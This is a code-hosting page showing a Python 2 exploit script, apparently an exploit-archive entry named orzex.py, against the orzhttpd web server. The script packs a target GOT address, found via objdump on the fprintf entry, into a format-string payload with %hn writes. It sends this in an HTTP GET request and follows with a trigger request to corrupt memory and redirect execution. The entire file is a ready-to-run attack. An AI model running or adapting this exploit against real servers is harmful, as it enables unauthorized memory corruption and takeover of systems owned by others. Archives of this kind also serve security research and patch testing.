FilesExpand file tree

 master

/

10282.py

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

61 lines (45 loc) · 1.38 KB

 master

/

10282.py

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

61 lines (45 loc) · 1.38 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

#!/usr/bin/env python

# orzex.py -- Patroklos Argyroudis, argp at domain census-labs.com

# http://code.google.com/p/orzhttpd/source/detail?r=141

import os

import sys

import socket

import struct

import time

import urllib

GET = "GET "

def main(argv):

argc = len(argv)

if argc != 4:

print "usage: %s <host> <port> <address>" % (argv[0])

print "[*] find address with objdump -R orzhttpd | grep fprintf"

sys.exit(0)

host = argv[1]

port = int(argv[2])

addr = int(argv[3], 16)

print "[*] target: %s:%d:%s" % (host, port, argv[3])

try:

sd = urllib.urlopen("http://%s:%d" % (host, port))

sd.close()

except IOError, errmsg:

print "[*] error: %s" % (errmsg)

sys.exit(1)

time.sleep(1)

fmtstr = struct.pack('<LL', addr + 2, addr)

fmtstr += "%.16650x%19$hn%.514x%20$hn"

payload = GET

payload += fmtstr

print "[*] sending exploit format string to %s:%d" % (host, port)

sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sd.connect((host, port))

sd.send(payload)

sd.close()

print "[*] sending trigger to %s:%d" % (host, port)

sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sd.connect((host, port))

sd.send(GET)

sd.close()

if __name__ == "__main__":

main(sys.argv)

sys.exit(0)

# EOF